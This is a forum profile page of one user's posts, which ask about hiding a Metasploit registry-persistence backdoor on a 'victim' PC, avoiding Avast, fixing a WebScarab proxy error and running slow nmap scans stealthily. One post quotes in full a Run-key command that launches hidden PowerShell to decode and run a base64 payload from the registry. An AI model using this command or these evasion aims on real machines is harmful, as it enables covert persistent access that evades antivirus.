
Vurraz

Everything posted by Vurraz

  1. Thank you so much. This worked. No window is seen. I'm so grateful. I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...). But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the victim PC to make this work... Is this going to trigger the antivirus? What about Avast? Do you have a cleaner solution in mind, instead of uploading 2 files to the victim? Is it possible to write the .vbs and .bat source code DIRECTLY into the registry key, so that no file needs to be uploaded? If so, please show me how.
  2. Hello, I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine. I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help. This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run) %COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))" I'm testing this on Windows 7 Enterprise.
  3. Hello, I've tried using webscarab today to try to crawl a website... I've noticed that webscarab uses 127.0.0.1:8008 as a proxy so I've set my Iceweasel browser proxy appropriately and when I tried navigating to the target website I've received this error in my browser, how do I fix it? Please notice that I've replaced the actual domain name with 'xx' for discretion.

     WebScarab encountered an error trying to retrieve

     GET xx
     Host: xx
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Referer: xx
     Cookie: __cfduid=db03a54a38722d4dbc1fdca62cdd39c031450900438; __utma=169678269.239294492.1450900443.1450900443.1450907363.2; __utmz=169678269.1450900443.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=her04reoorrl33fe2isrf8hka1; __utmb=169678269.15.10.1450907363; __utmc=169678269; __asc=afdea951151d0d5e16a3fb78073; __auc=afdea951151d0d5e16a3fb78073
     Connection: keep-alive
     Cache-Control: max-age=0

     The error was : No appropriate protocol (protocol is disabled or cipher suites are inappropriate)
       at sun.security.ssl.Handshaker.activate(Handshaker.java:470)
       at sun.security.ssl.SSLSocketImpl.kickstartHandshake(SSLSocketImpl.java:1450)
       at sun.security.ssl.SSLSocketImpl.performInitialHandshake(SSLSocketImpl.java:1320)
       at sun.security.ssl.SSLSocketImpl.writeRecord(SSLSocketImpl.java:721)
       at sun.security.ssl.AppOutputStream.write(AppOutputStream.java:122)
       at java.io.BufferedOutputStream.flushBuffer(BufferedOutputStream.java:82)
       at java.io.BufferedOutputStream.flush(BufferedOutputStream.java:140)
       at org.owasp.webscarab.model.Request.writeDirect(Request.java:233)
       at org.owasp.webscarab.model.Request.writeDirect(Request.java:214)
       at org.owasp.webscarab.httpclient.URLFetcher.fetchResponse(URLFetcher.java:242)
       at org.owasp.webscarab.plugin.openid.OpenIdHTTPClient.fetchResponse(OpenIdHTTPClient.java:59)
       at org.owasp.webscarab.plugin.saml.SamlHTTPClient.fetchResponse(SamlHTTPClient.java:94)
       at org.owasp.webscarab.plugin.proxy.CookieTracker$Plugin.fetchResponse(CookieTracker.java:130)
       at org.owasp.webscarab.plugin.proxy.BrowserCache$Plugin.fetchResponse(BrowserCache.java:101)
       at org.owasp.webscarab.plugin.proxy.RevealHidden$Plugin.fetchResponse(RevealHidden.java:100)
       at org.owasp.webscarab.plugin.proxy.BeanShell$Plugin.fetchResponse(BeanShell.java:229)
       at org.owasp.webscarab.plugin.proxy.ManualEdit$Plugin.fetchResponse(ManualEdit.java:243)
       at org.owasp.webscarab.plugin.proxy.ConnectionHandler.run(ConnectionHandler.java:223)
       at java.lang.Thread.run(Thread.java:745)
  4. Vurraz

    nmap question

    Oh, and another question came to mind - Am I going to be less stealthy if I use multiple T1 scans at the same moment? (Like a -T1 -sS scan in one terminal, and a -T1 -sU scan on another terminal within the same computer)
  5. Vurraz

    nmap question

    Hello, I've got one simple question - Is Nmap using up less bandwidth from my connection if I set Nmap to work on -T1 speed? Thanks in advance!